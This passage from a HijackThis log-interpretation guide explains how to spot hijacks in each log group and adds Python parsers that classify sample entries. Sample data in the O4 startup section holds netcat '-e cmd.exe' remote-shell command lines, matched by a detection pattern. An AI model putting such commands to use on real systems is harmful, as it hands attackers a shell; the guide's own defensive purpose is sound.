5. Troubleshooting the system with HijackThis.
Group R0, R1, R2, R3.
If the URLs listed here are ones you configured yourself, there is no problem and you can leave them as they are.
But if you did not set them, the addresses are unfamiliar and you do not recognize the name, mark the entry and click Fix Checked.
Good Example:
Code:
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page=www.google.com
Bad Example:
Code:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar=res://C:\WINDOWS\TEMP\se.dll/sp.html
NOTE: R2 is no longer used.
Continuing R3:
R3 refers to the URLSearchHook. When you type a URL in the address bar without a protocol (http://, ftp://), the browser first tries to find the machine; if it does not succeed, it hands the text to the URLSearchHook.
Good Example:
R3 - Default URLSearchHook is missing
Bad Example, which you should mark and Fix Checked:
Code:
R3 - URLSearchHook:(no name)-_(CFBFAE00-17A6-11D0-99CB-00C04FD64497)-(no file)
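The rules above for the R group (a web address as start page is fine, a start or search page served from a local DLL is not, a missing default URLSearchHook is fine, a hook whose file is gone is not) can be applied mechanically to the log lines. The following is an added example, not part of the original manual or of HijackThis itself; the sample lines are constructed from the examples above, and the parser assumes the usual HijackThis line layout.

```python
import re

# Constructed sample R-group lines, modelled on the good and bad examples above.
SAMPLE_R_LINES = [
    r"R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page=www.google.com",
    r"R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar=res://C:\WINDOWS\TEMP\se.dll/sp.html",
    r"R3 - Default URLSearchHook is missing",
    r"R3 - URLSearchHook: (no name) - _{CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)",
]

# "Rn - <key>,<value name>=<data>" (R0/R1)
R_VALUE_RE = re.compile(r"^(R[01]) - (HK\w+\\[^,]+),([^=]+)=(.*)$")
# "R3 - URLSearchHook: <name> - {<CLSID>} - <file>"; HijackThis sometimes prints an underscore before the brace
R_HOOK_RE = re.compile(r"^(R3) - URLSearchHook: (.*?) - _?\{([0-9A-Fa-f-]{36})\} - (.*)$")
# Start/search pages that are local resources (res://, file://, C:\...) rather than web URLs
LOCAL_TARGET_RE = re.compile(r"^(res|file)://|^[A-Za-z]:\\", re.I)


def parse_r_line(line):
    """Split one R-group log line into its parts; None if the line is not an R entry."""
    m = R_VALUE_RE.match(line)
    if m:
        group, key, name, value = m.groups()
        return {"group": group, "key": key, "name": name.strip(), "value": value.strip()}
    m = R_HOOK_RE.match(line)
    if m:
        group, name, clsid, path = m.groups()
        return {"group": group, "hook_name": name, "clsid": clsid.upper(), "path": path.strip()}
    if line.startswith("R3 - Default URLSearchHook is missing"):
        return {"group": "R3", "default_hook_missing": True}
    return None


def classify(entry):
    """'ok', 'suspicious', 'review' or 'unparsed', following the rules in the text."""
    if entry is None:
        return "unparsed"
    if entry["group"] in ("R0", "R1"):
        # A start or search page served from a local DLL or file is the pattern of the
        # bad example above; a plain web address is fine.
        return "suspicious" if LOCAL_TARGET_RE.match(entry["value"]) else "ok"
    if entry.get("default_hook_missing"):
        return "ok"                      # the text lists this as the good R3 case
    if entry["path"].lower() == "(no file)":
        return "suspicious"              # hook registered but its DLL is gone: mark and Fix Checked
    return "review"                      # a hook with a real file: look the CLSID up first


def assess(lines):
    """Pair every line with its verdict."""
    return [(line, classify(parse_r_line(line))) for line in lines]


if __name__ == "__main__":
    for line, verdict in assess(SAMPLE_R_LINES):
        print(f"{verdict:10s} {line}")
```

A hook with a real file gets "review" rather than a verdict, because only the CLSID lookup described later (group O2) can tell a legitimate search hook from a hijacker's.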
____________________________________________________________________________________________________ ____________________
Group F0, F1, F2, F3.
These are programs loaded from the *.ini files (win.ini, system.ini).
F0: According to the sources I consulted, if there is a line that starts with F0 it is recommended to mark it and click Fix Checked.
F1: Programs loaded by old Windows 3.1/95/98 systems through the Run= and Load= keys of the win.ini file. Here you should look up information on the program before marking it and clicking Fix Checked.
F2 and F3: The same as above, but for NT-kernel systems (Windows NT/2000/XP), which do not use the system.ini and win.ini startup files named above in the same way; instead they are mapped through the registry.
Some examples of reference:
Code:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
Code:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit=[**]\system32\userinit.exe,[**]\moralla.exe
Under Windows NT the default is userinit.exe; nddeagnt.exe is also normal on that system. Any other executable here is highly likely to be spyware and/or a trojan.
____________________________________________________________________________________________________ ____________________
Group N1, N2, N3, N4.
Home page / search URLs in Netscape / Mozilla.
N1: Refers to the home page and search engine of Netscape 4.
N2: Refers to the home page and search engine of Netscape 6.
N3: Refers to the home page and search engine of Netscape 7.
N4: Corresponds to the home page and search engine of Mozilla Firefox.
These settings are usually found in the prefs.js file.
NOTE:
Currently, most spyware, malware and hijackers are written for IE and not for Mozilla, Netscape or Opera, so those browsers remain somewhat safer than IE.
____________________________________________________________________________________________________ ____________________
O1 group:
Corresponds to hijacks of the Hosts file.
What is the Hosts file?
The Hosts file works as a kind of translator: it is responsible for establishing the relationship between an IP address and a hostname. For example, the entry:
127.0.0.1 www.google.com
If you try to go to www.google.com, the hosts file is checked first, the entry is found, and the name resolves to the IP address 127.0.0.1.
In this box you will see the default paths of the Hosts file:
If you see entries like the one shown above and there is no specific reason you know of for them to be there, you can safely delete them.
If you see that the hosts file is located at C:\Windows\Help\hosts, that means you are infected with CoolWebSearch. If you notice that the hosts file is not in the default path for your operating system, mark the entry in the HijackThis scan and click Fix Checked, or use another program to clean up the Hosts file.
If you are not a very advanced user and do not want to complicate things with HijackThis, you can use the host program, which restores the hosts file to the default configuration for your system.
To do this, download the host program from here: Download Host. Run it, and once it opens click the "Restore Original Host" button; when that is done, close the program.
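To see what "checking the hosts file" amounts to, here is an added example (not part of the original manual or of any of the tools it names) that parses a hosts file the way the resolver reads it and flags every mapping that sends a real hostname somewhere other than itself, plus a check of the file's location against the rules above. The sample file content is constructed; the default paths assume a C:\WINDOWS system root, and the paths themselves are the standard Windows locations (System32\drivers\etc\hosts on NT/2000/XP, the Windows folder on 9x).

```python
# Default Hosts file locations. The C:\WINDOWS system root is an assumption for this example;
# on a real machine use %SystemRoot%.
DEFAULT_HOSTS_PATHS = {
    "nt": r"C:\WINDOWS\System32\drivers\etc\hosts",   # Windows NT/2000/XP
    "9x": r"C:\WINDOWS\hosts",                        # Windows 95/98/ME
}
# Location the text names as a sign of a CoolWebSearch infection
CWS_HOSTS_PATH = r"C:\Windows\Help\hosts"

LOOPBACK_NAMES = {"localhost", "localhost.localdomain"}

# Constructed sample Hosts file: the normal localhost line, the google.com entry from the text,
# and a well-known site pointed at a foreign address.
SAMPLE_HOSTS = """# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1       www.google.com
69.57.146.14    www.hotmail.com   # sends hotmail traffic elsewhere
"""


def parse_hosts(text):
    """Yield (line number, ip, hostname) for every mapping, ignoring comments and blank lines."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for name in names:            # one IP may carry several hostnames on a line
            yield lineno, ip, name.lower()


def suspicious_entries(text):
    """Mappings that send a real hostname somewhere other than its own address."""
    flagged = []
    for lineno, ip, name in parse_hosts(text):
        if name in LOOPBACK_NAMES:
            continue                  # the standard '127.0.0.1 localhost' line
        if ip.startswith("127.") or ip == "0.0.0.0":
            reason = "points the site at this machine (site blocked or replaced)"
        else:
            reason = f"redirects the site to {ip}"
        flagged.append((lineno, name, reason))
    return flagged


def _norm(path):
    """Case- and slash-insensitive comparison key for Windows paths."""
    return path.replace("/", "\\").lower()


def hosts_path_status(path, windows_family="nt"):
    """'coolwebsearch', 'default' or 'non-default', per the rules in the text."""
    if _norm(path) == _norm(CWS_HOSTS_PATH):
        return "coolwebsearch"
    if _norm(path) == _norm(DEFAULT_HOSTS_PATHS[windows_family]):
        return "default"
    return "non-default"


if __name__ == "__main__":
    for lineno, name, reason in suspicious_entries(SAMPLE_HOSTS):
        print(f"line {lineno}: {name}: {reason}")
    print(hosts_path_status(r"C:\Windows\Help\hosts"))
```

Entries that map a site to 127.0.0.1 are reported separately from entries that map it to a foreign address: the first kind silently blocks the site (often an anti-virus vendor's update server), the second sends the user to a machine of the hijacker's choosing, which is the more dangerous case.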
____________________________________________________________________________________________________ ____________________
O2 Group:
This group belongs to the Browser Helper Objects (BHO).
Real example of BHO:
Code:
BHO: NAV Helper- -C:\Program Files\Norton AntiVirus\NavShExt.dll
To decide about these kinds of entries, we can consult a list like the one hosted by Sysinfo, which can be found here: http://sysinfo.org/bholist.php
When consulting the list, pay attention to the CLSID, which is the string between braces. The CLSIDs in the list refer to the registry entries that contain the information about each BHO.
Once malicious entries are detected, mark them and click Fix Checked. HijackThis will then try to delete them immediately, but it may not be able to, because the files are in use.
In that case, boot into safe mode (press F8 before Windows starts) and delete them manually.
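The text's advice to match on the CLSID rather than on the displayed name is the key point of this group: the name is free text that a hijacker can copy from a legitimate product, while the CLSID is what the registry and the published lists are keyed on. The following is an added example, not part of the original manual or of HijackThis; the log lines, the CLSIDs and the small lookup table are all constructed placeholders standing in for a real BHO list such as the Sysinfo one.

```python
import re

# Constructed sample O2 lines in HijackThis format. The CLSIDs are placeholders made up for
# this example, not the real identifiers of any product.
SAMPLE_O2_LINES = [
    r"O2 - BHO: NAV Helper - {00000000-0000-0000-0000-00000000AAAA} - C:\Program Files\Norton AntiVirus\NavShExt.dll",
    r"O2 - BHO: NAV Helper - {00000000-0000-0000-0000-00000000BBBB} - C:\WINDOWS\TEMP\se.dll",
    r"O2 - BHO: (no name) - {00000000-0000-0000-0000-00000000CCCC} - (no file)",
    r"O2 - BHO: (no name) - {00000000-0000-0000-0000-00000000DDDD} - C:\WINDOWS\System32\xyz.dll",
]

# Constructed stand-in for a published BHO list, keyed by CLSID: verdict and description.
BHO_LIST = {
    "00000000-0000-0000-0000-00000000AAAA": ("legitimate", "antivirus browser helper"),
    "00000000-0000-0000-0000-00000000BBBB": ("malicious", "search-page hijacker using a copied name"),
}

# "O2 - BHO: <name> - {<CLSID>} - <file>"
O2_RE = re.compile(r"^O2 - BHO: (.*?) - \{([0-9A-Fa-f-]{36})\} - (.*)$")


def parse_o2(line):
    """Split one O2 line into name, CLSID and file; None if it is not an O2 entry."""
    m = O2_RE.match(line)
    if not m:
        return None
    name, clsid, path = m.groups()
    return {"name": name.strip(), "clsid": clsid.upper(), "file": path.strip()}


def classify_bho(entry, bho_list=BHO_LIST):
    """Verdict for one BHO: the list decides by CLSID, never by the displayed name."""
    listed = bho_list.get(entry["clsid"])
    if listed:
        return listed[0]
    if entry["file"].lower() == "(no file)":
        return "orphaned"      # registration left behind by a removed DLL; fixing it is safe
    return "unknown"           # not in the list: research the CLSID before fixing


def assess_o2(lines, bho_list=BHO_LIST):
    """Verdict per line; lines that are not O2 entries are skipped."""
    results = []
    for line in lines:
        entry = parse_o2(line)
        if entry is not None:
            results.append((entry["clsid"], entry["name"], classify_bho(entry, bho_list)))
    return results


if __name__ == "__main__":
    for clsid, name, verdict in assess_o2(SAMPLE_O2_LINES):
        print(f"{verdict:10s} {clsid}  {name}")
```

Note that the second sample line carries the same display name as the first; only the CLSID lookup tells them apart, which is exactly why the text says to emphasize the CLSID.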
____________________________________________________________________________________________________ ____________________
Group O3:
This group corresponds to the toolbars of Internet Explorer.
These are the well-known "Toolbars", located below the navigation bar or in the context menu of IE.
They are registered under the following registry key:
Code:
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar
Example:
Code:
Toolbar: Norton AntiVirus - - C:\Program Files\Norton AntiVirus\NavShExt.dll
If you did not accept these entries, or do not recognize their names, you can consult the Sysinfo list mentioned in the previous group to find the entry and see whether it belongs on your system or not. If you do not want something on your system, you can delete it easily, as before: mark the entry and click Fix Checked.
This group behaves the same as the previous one. HijackThis will attempt to delete the selected entries, but some cannot be deleted that way; you have to boot into safe mode and delete them manually.
____________________________________________________________________________________________________ ____________________
O4 Group:
This group covers the programs and applications that start together with Windows on our system.
They are usually found in the registry Run keys and in the Startup folders. This applies only to NT, XP and 2000.
- The registry keys that can hold these applications are:
Code:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
NOTE: HKLM = HKEY_LOCAL_MACHINE; HKCU = HKEY_CURRENT_USER.
There are also two folders from which applications can be started:
Startup: C:\Documents and Settings\USERNAME\Start Menu\Programs\Startup -> particular user.
Global: C:\Documents and Settings\All Users\Start Menu\Programs\Startup -> points to all users.
When fixing O4 entries, HijackThis does not delete the files associated with the entry. You must delete them manually, usually after rebooting the machine into safe mode. Startup and Global Startup entries work a little differently: HijackThis deletes the shortcuts in these folders, but not the files they point to. If the executable itself resides in the Startup or Global Startup folder, it will be deleted.
Example of legitimate application:
Code:
HKLM\ ... \Run:[Winamp]"C:\Winamp\winamp.exe"/(can be any argument)
Possible malicious application example:
Code:
HKLM\...\Run:[**]210.xxx nc-vv-e cmd.exe "
You can check these lists of legitimate startup programs against your log to see whether the applications that start with your system are legitimate or, in the worst case, trojans, spyware or hijackers.
These lists can help you:
http://www.answersthatwork.com/Taskl...s/tasklist.htm
http://greatis.com/regrun3appdatabase.htm
http://www.sysinfo.org/startuplist.php
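Comparing O4 entries against a list of known startups is exactly what the links above are for; the following added example (not the manual's own code nor part of HijackThis) shows the check in code. It parses both forms of O4 line (registry Run keys and the Startup folders), pulls the executable out of the command line even when the path is unquoted and contains spaces, and reports entries that are on a constructed allowlist, entries that show the warning signs of the suspicious example above (a tool run from a temp directory, arguments that hand cmd.exe to a network program), and entries that simply need to be looked up. The sample lines, the allowlist and the 203.0.113.5 address are constructed.

```python
import re

# Constructed sample O4 lines in HijackThis format: one legitimate entry like the Winamp example
# above, one modelled on the suspicious example above, and one that is simply unknown.
SAMPLE_O4_LINES = [
    r'O4 - HKLM\..\Run: [Winamp] "C:\Winamp\winamp.exe" /MIN',
    r'O4 - HKCU\..\Run: [msupdate] C:\WINDOWS\TEMP\nc.exe 203.0.113.5 -vv -e cmd.exe',
    r'O4 - Startup: backup.lnk = C:\Program Files\Backup\backup.exe',
]

# Constructed allowlist; in practice fill it from the startup lists linked above.
KNOWN_GOOD = {"winamp.exe"}

O4_REG_RE = re.compile(r"^O4 - (HKLM|HKCU)\\\.\.\\(\w+): \[(.*?)\] (.*)$")
O4_DIR_RE = re.compile(r"^O4 - (Startup|Global Startup): (.*?) = (.*)$")
TEMP_DIR_RE = re.compile(r"\\temp\\|\\tmp\\", re.I)
# "-e cmd.exe" style argument: a network tool told to attach a command shell to the connection
SHELL_ARG_RE = re.compile(r"(^|\s)-e\s+cmd(\.exe)?(\s|$)", re.I)


def split_command(cmd):
    """Separate the executable from its arguments, quoted or not."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end], cmd[end + 1:].strip()
    # Unquoted: the executable ends at the first ".exe", even if the path contains spaces
    m = re.match(r"(.+?\.exe)\b(.*)$", cmd, re.I)
    if m:
        return m.group(1), m.group(2).strip()
    parts = cmd.split(None, 1)
    return parts[0], (parts[1] if len(parts) > 1 else "")


def parse_o4(line):
    """Return source, entry name, executable and arguments; None for non-O4 lines."""
    m = O4_REG_RE.match(line)
    if m:
        hive, key, name, cmd = m.groups()
        exe, args = split_command(cmd)
        return {"source": f"{hive}\\..\\{key}", "name": name, "exe": exe, "args": args}
    m = O4_DIR_RE.match(line)
    if m:
        folder, shortcut, cmd = m.groups()
        exe, args = split_command(cmd)
        return {"source": folder, "name": shortcut, "exe": exe, "args": args}
    return None


def classify_o4(entry):
    """'known-good', 'suspicious: <reasons>' or 'unknown: look it up'."""
    base = entry["exe"].rsplit("\\", 1)[-1].lower()
    if base in KNOWN_GOOD:
        return "known-good"
    reasons = []
    if TEMP_DIR_RE.search(entry["exe"]):
        reasons.append("runs from a temp directory")
    if "\\" not in entry["exe"]:
        reasons.append("bare filename resolved through PATH")
    if SHELL_ARG_RE.search(entry["args"]):
        reasons.append("arguments hand cmd.exe to a network tool")
    return "suspicious: " + "; ".join(reasons) if reasons else "unknown: look it up"


if __name__ == "__main__":
    for line in SAMPLE_O4_LINES:
        entry = parse_o4(line)
        print(f"{classify_o4(entry):55s} {entry['source']} [{entry['name']}] {entry['exe']}")
```

The allowlist is matched on the executable's file name, which is how the linked lists are organised; a file name alone is a weak identity, so anything that is not on the list still gets the temp-directory and argument checks before it is marked unknown.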
____________________________________________________________________________________________________ ____________________
O5 Group:
This group concerns IE settings that have been made inaccessible from the Control Panel.
This is done by adding an entry to the Control.ini file, which by default is found at C:\Windows\Control.ini. By modifying this file you can specify which control panel applets should not be visible.
Example: the line inet.cpl=no in Control.ini hides the IE options in the Control Panel.
If you find a line like this in your log and it was not put there by you, by another person you trust, or by whoever manages the system, it is a sign that a malicious application is trying to block or impede changes to the IE options. It may also be a restriction placed by anti-spyware software such as SpyBot or Ad-Aware; in that case you can leave it with peace of mind, otherwise you can use HijackThis to fix it.
____________________________________________________________________________________________________ ____________________
O6 Group:
This section corresponds to restrictions, set by an administrator through certain registry settings, on changing the settings or the home page of Internet Explorer.
Example:
Code:
HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions
These options are only blocked if the administrator set them, if you set them yourself for personal use, or if the "Immunize" function of the anti-spyware software SpyBot: Search & Destroy has been activated to lock the IE options.
____________________________________________________________________________________________________ ____________________
Group O7:
This section corresponds to Regedit being unable to run because of a change to a registry entry.
Registry key:
Code:
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
Sample O7 entry:
Code:
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System:
DisableRegedit=1
NOTE: In some places, such as internet cafés, businesses or other sites, administrators block access to regedit so that settings cannot be changed. But if you see this on your own system and you did not set it, you can use HijackThis to delete it easily.
____________________________________________________________________________________________________ ____________________
Group O8:
This group is for the extra items found in the context menu of Internet Explorer.
That is, the options you see when you right-click on any web page you are viewing in your browser.
Code:
Registry key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
Sample O8 entry:
Code:
Extra context menu item: &Google Search - res://c:\windows\GoogleToolbar1.dll/cmsearch.html
The listing for these entries shows the item that appears in the context menu when you right-click, and which program is used when you click that option. Some, like "Browser Pal", should always be erased; the rest should be looked up on Google before doing anything. An example of a legitimate program we could find here is the Google Toolbar.
When you fix these entries, HijackThis does not delete the files mentioned in the list. It is recommended that you restart in safe mode, as in the previous cases, and delete these files and/or folders manually.
____________________________________________________________________________________________________ ____________________
Group O9:
This group corresponds to the buttons in the main toolbar of IE, or the items on the Tools menu of IE, that are not part of the default installation.
Code:
Registry Key:HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions
Sample O9 entry:
Code:
Extra Button: AIM (HKLM)
If you do not need these buttons or menu items, or you recognize them as malware, you can safely fix them.
As in the previous groups, HijackThis cannot delete the files mentioned here; you have to reboot into safe mode and manually delete the malicious folders and/or files.
____________________________________________________________________________________________________ ____________________
Group O10:
This group corresponds to the Winsock hijackers, also known as LSPs (Layered Service Providers). LSPs are a way for software to hook into the Winsock 2 implementation on your computer. Since LSPs are chained, whenever Winsock is used the data is passed through each LSP in the chain. Spyware and hijackers can use LSPs to see all the traffic generated on your Internet connection.
Be careful when removing these objects: if they are removed improperly, you could lose access to the Internet.
Sample O10 entry:
Code:
Broken Internet access because of LSP provider 'spsublsp.dll' missing
Many virus scanners scan for viruses, trojans, etc. at the Winsock level. The problem is that many of them do not reorder the LSP chain correctly after deleting the problematic LSP. This can cause a problem and make HijackThis display a warning similar to the example above, even though the Internet still works. You should consult an expert before fixing these errors. You can also use LSPFix to fix them.
SpyBot can usually fix it too, but make sure you have the latest version, as older versions had problems with this.
If you are not a very advanced user, instead of HijackThis you can use a tool called LSPFix (Download) to fix these errors.
____________________________________________________________________________________________________ ____________________
Group O11:
This group lists non-default options that have been added to the Advanced tab of Internet Options in Internet Explorer.
If you go to the Tools menu >> Internet Options you will see the Advanced tab. A new set of options can be made to appear there by adding an entry under a registry key.
Code:
Registry Key:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions
Sample O11 entry:
Code:
Options group: [CommonName] CommonName
From the manual I read, I quote: "According to Merijn, the creator of HijackThis (and also CWShredder, StartupList, etc.), only one hijacker is known to use this, and it is CommonName. If you see CommonName in the list, you can safely remove it. If you see another entry you should use Google to research a little."
____________________________________________________________________________________________________ ____________________
Group O12:
This group corresponds to the plug-ins or add-ons for Internet Explorer. Plug-ins or add-ons are pieces of software loaded when Internet Explorer starts, to add functionality to the browser. There are many legitimate plug-ins available, such as the one for displaying PDF files, and also illegitimate ones.
Code:
Registry key:HKEY_LOCAL_MACHINE\software\microsoft\internet explorer\plugins
Code:
Sample O12 entry: Plugin for .PDF: C:\Program Files\Internet Explorer\PLUGINS\nppdf32.dll
Many of the plug-ins are legitimate, so you should look them up on Google before deleting anything.
One of the most widespread illegitimate plug-ins is Onflow, which uses the .OFB extension.
When you fix these entries, HijackThis will try to delete the listed file. Sometimes the file may be in use even if Internet Explorer is closed. If the file is still not removed, boot into safe mode and remove it manually.
____________________________________________________________________________________________________ ____________________
Group O13:
This group corresponds to hijacking of Internet Explorer's default prefix. The prefix is a default setting in Windows that specifies how URLs typed without a protocol (http://, ftp://, etc.) are handled. By default Windows adds http:// at the beginning as the default prefix. You can change this default prefix to one of your choice by editing the registry. The hijacker known as CoolWebSearch does this by changing the default prefix to http://ehttp.cc/?. That means that when you go to a URL such as www.google.com, you actually go to http://ehttp.cc/?www.google.com, which is the CoolWebSearch website.
Code:
Registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix\
If you are experiencing problems like the one described above, you should run CWShredder. This program removes all known variants of CoolWebSearch that may be on your machine.
If CWShredder does not find or fix the problem, you can use HijackThis to fix this entry if it is found.
____________________________________________________________________________________________________ ____________________
Group O14.
This group is for hijacking of "Reset Web Settings". There is a file on your computer that IE (Internet Explorer) uses when you reset its options to the defaults. This file is saved by default at C:\Windows\inf\iereset.inf and contains all the default settings to be used. When you reset the configuration, IE reads this file and changes the settings to those in the file. If a hijacker changes the information in that file, then when you reset, IE is re-configured with the wrong information read from iereset.inf.
In conclusion, if you see such an entry in your log, it does not always mean it is bad. It may have been made by you or by a computer administrator, and you should leave it if you know the address of the file. Conversely, if it is unknown to you, mark it and click Fix Checked.
____________________________________________________________________________________________________ ____________________
Group O15.
This group corresponds to unwanted sites in the Trusted Sites zone of IE. The security of Internet Explorer is based on a number of zones. Each zone has a different security level in terms of the scripts and applications that can run while you are browsing in that zone. You can add domains to particular zones, so if you are browsing a domain that has been put in a low-security zone, scripts, some potentially dangerous, are allowed to run from that website.
Code:
Registry key:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
So if we do not know the source or the URL of an entry, we mark it and click Fix Checked.
____________________________________________________________________________________________________ ____________________
Group O16.
This group is for ActiveX objects, also known as Downloaded Program Files.
ActiveX objects are programs downloaded from websites and stored on your computer. By default these objects are stored in C:\windows\Downloaded Program Files. They are referenced in the registry by their CLSID, a long string of numbers in braces {}. There are many legitimate ActiveX controls, such as this example, an iPIX viewer,
or an ActiveX for playing an online game.
Many are legitimate, but others are used with other intentions.
If you see names or addresses you do not recognize, you should search Google to see whether they are legitimate. If you confirm that they are illegitimate, you can fix them. Removing an ActiveX object from your computer is no big problem: it will be downloaded again when you return to the site it came from.
As we said above, not all ActiveX objects are illegitimate. Many are used by legitimate websites to provide access to certain functions that are not possible without the ActiveX object.
For example:
Any online antivirus, such as Eset or Kaspersky, needs to run an ActiveX in order to read the contents of your files and analyze them.
When you fix these entries, HijackThis will try to delete the listed file. Sometimes the file may be in use even if Internet Explorer is closed. If the file is still not removed, boot into safe mode and remove it manually.
____________________________________________________________________________________________________ ____________________
Group O17.
This group is for the Lop.com domain hijack.
When we go to a website using a domain name such as www.hotmail.com instead of an IP address, your computer uses a DNS server to translate the domain name into an IP address like 200.56.15.85. The domain hijack happens when the hijacker changes the DNS servers on your machine to servers they control, so they can send you anywhere they want. By adding www.hotmail.com to their own DNS servers, they can make it so that when you go to www.hotmail.com you are redirected to a site of their choice, for example a site that downloads more malware to your computer or infects you with a trojan.
Code:
Sample List O17 - HKLM\System\CS1\Services\VxD\MSTCP:NameServer=69.57.146.14,69.57.147.175
If you see entries of this type and you do not recognize the domain as belonging to your ISP or to the company that gives you Internet access, and the DNS servers do not belong to your ISP or company either, then you should use HijackThis to fix this.
Otherwise, you can do a Whois on the IP addresses to see which company they belong to.
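The decision in this group comes down to "are the configured name servers ones we expect?", which is easy to automate once the O17 line is parsed. The following is an added example, not the manual's own code nor part of HijackThis: it extracts the NameServer list from an O17 line (both the spaced and the compact layout HijackThis uses) and checks each address against a set of expected resolver ranges using the standard ipaddress module. The O17 line is constructed from the sample above; the 200.56.0.0/16 range is a made-up placeholder for the ISP's real resolver ranges, which you would take from the ISP's documentation or the Whois lookup the text mentions.

```python
import ipaddress
import re

# Constructed O17 line, modelled on the sample above (same two name servers).
SAMPLE_O17 = r"O17 - HKLM\System\CS1\Services\VxD\MSTCP: NameServer = 69.57.146.14,69.57.147.175"

# Placeholder for the ISP's resolver ranges (constructed; 200.56.15.85 is the address cited above).
ISP_RESOLVER_RANGES = [ipaddress.ip_network("200.56.0.0/16")]

# "O17 - <key>: <value name> = <data>", with or without the spaces around ':' and '='
O17_RE = re.compile(r"^O17 - (.+?): ?(NameServer|Domain|SearchList) ?= ?(.*)$")


def parse_o17(line):
    """Return the registry key, value name and the list of configured values; None otherwise."""
    m = O17_RE.match(line)
    if not m:
        return None
    key, name, value = m.groups()
    # NameServer is a comma- or space-separated list of resolver addresses
    values = [v for v in re.split(r"[,\s]+", value.strip()) if v]
    return {"key": key, "name": name, "values": values}


def check_nameservers(entry, trusted_ranges):
    """Per-resolver verdict: local, within ISP range, outside known ranges, or not an address."""
    report = []
    for v in entry["values"]:
        try:
            ip = ipaddress.ip_address(v)
        except ValueError:
            report.append((v, "not an IP address"))
            continue
        if ip.is_private or ip.is_loopback:
            report.append((v, "local resolver (router or LAN), normal"))
        elif any(ip in net for net in trusted_ranges):
            report.append((v, "within ISP resolver range"))
        else:
            report.append((v, "outside known ISP ranges: verify with Whois, fix if unknown"))
    return report


def assess_o17(line, trusted_ranges=ISP_RESOLVER_RANGES):
    """Convenience wrapper: parse and check one O17 line; [] for non-O17 lines."""
    entry = parse_o17(line)
    if entry is None or entry["name"] != "NameServer":
        return []
    return check_nameservers(entry, trusted_ranges)


if __name__ == "__main__":
    for server, verdict in assess_o17(SAMPLE_O17):
        print(f"{server:16s} {verdict}")
```

Private and loopback addresses are reported as normal because a home router or a LAN DNS server is the usual case; a public address that belongs to neither the ISP nor the company is the one that deserves the Whois check before fixing.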
____________________________________________________________________________________________________ ____________________
Group O18.
This group is for extra protocols and protocol hijackers.
This method replaces the standard protocol handlers that your computer uses with the hijacker's own. This lets the hijacker take control of certain channels over which your computer sends and receives information.
Code:
Registry Keys:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter
HijackThis first reads the protocols registry key looking for non-standard protocols. When it finds one, it looks up the CLSID to get more information and the file path.
Code:
Sample List O18 - Protocol: relatedlinks - - C:\PROGRA~1\COMMON~1\MSIETS\msielink.dll
The most common hijackers that do this are CoolWebSearch, Related Links and Lop.com. If you see these names you can fix them using HijackThis.
Use Google to check whether the files are legitimate. You can also use the CastleCops O18 list as a reference to verify the files.
When you fix these entries, HijackThis will try to delete the listed file. Sometimes the file may be in use even if Internet Explorer is closed. If the file is still not removed, boot into safe mode and remove it manually.
____________________________________________________________________________________________________ ____________________
Group O19.
This group is for hijacking of the user's style sheet.
A style sheet is a template for how the layout, colors and fonts of an HTML page are displayed. This type of hijacking overrides the default style sheet, which was designed to help users, and causes large numbers of pop-ups (advertising pop-ups) or spam, resulting in annoyance or a potential slowdown.
Code:
Registry key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles, value User Stylesheets
Code:
Sample List O19 - User style sheet: c:\WINDOWS\Java\my.css
In general, these entries can be fixed without major problems with HijackThis.
When you fix these entries, HijackThis will try to delete the listed file. Sometimes the file may be in use even if Internet Explorer is closed. If the file is still not removed, boot into safe mode and remove it manually.
____________________________________________________________________________________________________ ____________________
Group O20.
This group is for files that are loaded via the AppInit_DLLs registry value.
